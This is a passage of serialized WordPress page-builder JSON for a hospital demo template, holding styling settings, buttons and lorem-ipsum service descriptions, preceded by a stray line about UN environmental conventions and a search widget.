- The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics, Institutions Resources, and Other useful data.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"vmjwleh\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3a3bcf4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"ho7i20h\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#01aef0\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"xy8zxqm\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-heartbeat\",\"title_text\":\"Cardiac Rehab\",\"description_text\":\"Aenean vulputate viverra odio eget dignissim. Aliquam suscipit titus ipsum velit lacus scelerisque.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"ze0ehm9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"73ci3v0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#5fc6ef\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"lb2mzdw\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-medkit\",\"title_text\":\"Gynecology\",\"description_text\":\"Phasellus lacus erat, sagittis eu consequat ac, luctus faucibus cati libero mauris vel nulla.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"ohhadxb\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"w62h9z0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#01aef0\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"1q7ujfs\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-stethoscope\",\"title_text\":\"Symptom Check\",\"description_text\":\"Mauris sodales felis ut porttitor placerat. Curabitur et lorem consectetur finibus ipsum.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"vn30vxq\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"gcyn1zg\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#5fc6ef\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"hnlb77z\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-clock-o\",\"title_text\":\"Rehabilitation\",\"description_text\":\"Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"f41bjy0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"xf3xggu\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"756a496\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"gjruaqu\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100},\"elements\":[{\"id\":\"dckxccw\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-user-md\",\"title_text\":\"General Surgery\",\"description_text\":\"Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.\",\"position\":\"left\",\"primary_color\":\"#01aef0\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"hx0bfps\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"#eaeaea\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"98dsrav\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-hospital-o\",\"title_text\":\"Pediatric Clinic\",\"description_text\":\"Donec ut sapien vel erat suscipit tincidunt in quis odio. Aliquam id lacinia turpis, et auctor eros. Pellentesque aliquet, diam non varius convallis, erat diam facilisis nibh, ultricies.hospital\",\"position\":\"left\",\"primary_color\":\"#5fc6ef\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"az3bsd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100},\"elements\":[{\"id\":\"p6fdudg\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-ambulance\",\"title_text\":\"Emergency Departments\",\"description_text\":\"Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.\",\"position\":\"right\",\"primary_color\":\"#5fc6ef\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"qg9bbu9\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"#eaeaea\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"ahzx2ew\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-wechat\",\"title_text\":\"24\\/7 Services\",\"description_text\":\"Feugiat vel erat non molestie. testus Nulla arcu nisi, pretium sed tincidunt at, commodo eget lorem. In hac habitasse platea dictumst. Nam eleifend leo euismod. Aliquam ipsum dolor.\",\"position\":\"right\",\"primary_color\":\"#01aef0\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"42yxmso\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#fcfcfc\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#eaeaea\",\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e898dc3\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"iulpcd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"m7heks5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Reserve now in our hospital\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":1.4}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"zq38c4y\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"9kdvz1o\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"y3vt4zr\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8088599\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1fhtv2k\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fnui4s\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_563214.jpg\",\"id\":144},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"104\",\"height\":\"104\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.2)\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"hlxu9mu\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"title_text\":\"Transplant Services\",\"description_text\":\"Nulla metus metus ullamcorper vel tincidunt sed, euismod in ouisque volutpat litora torquent\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"k5ey6e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read More\",\"align\":\"center\",\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0.4},\"button_text_color\":\"#333333\",\"background_color\":\"rgba(0,0,0,0)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"vpd68pg\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"sp1hkvu\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_957412.jpg\",\"id\":145},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"104\",\"height\":\"104\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.2)\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"tfbwu8m\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"title_text\":\"Pediatric Clinic\",\"description_text\":\"Sed lectus. Integer euismod lacus luctus magna. Quisque cursus, metus vitae sem massa mattis\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"wiytuem\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read More\",\"align\":\"center\",\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0.4},\"button_text_color\":\"#333333\",\"background_color\":\"rgba(0,0,0,0)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"skqiyik\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fv7id0y\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_369542.jpg\",\"id\":143},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"104\",\"height\":\"104\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.2)\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1fkclio\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"title_text\":\"Dental Clinic\",\"description_text\":\"Ullamcorper. Nulla facilisi. Integer lacinia sollicitudin massa. Cras metus. Sed aliquet risus a id tortor\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"mtrt6oy\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read More\",\"align\":\"center\",\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0.4},\"button_text_color\":\"#333333\",\"background_color\":\"rgba(0,0,0,0)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xm3kst6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Register Now\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"background_color\":\"#01aef0\",\"hover_color\":\"#01aef0\",\"button_background_hover_color\":\"rgba(0,0,0,0)\",\"button_hover_border_color\":\"#01aef0\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#01aef0\",\"border_radius\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"30\",\"bottom\":\"10\",\"left\":\"30\",\"isLinked\":false},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"960wyxr\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#01aef0\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8dbf01c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"8231wcp\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b8k6776\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":142,\"title\":\"saved 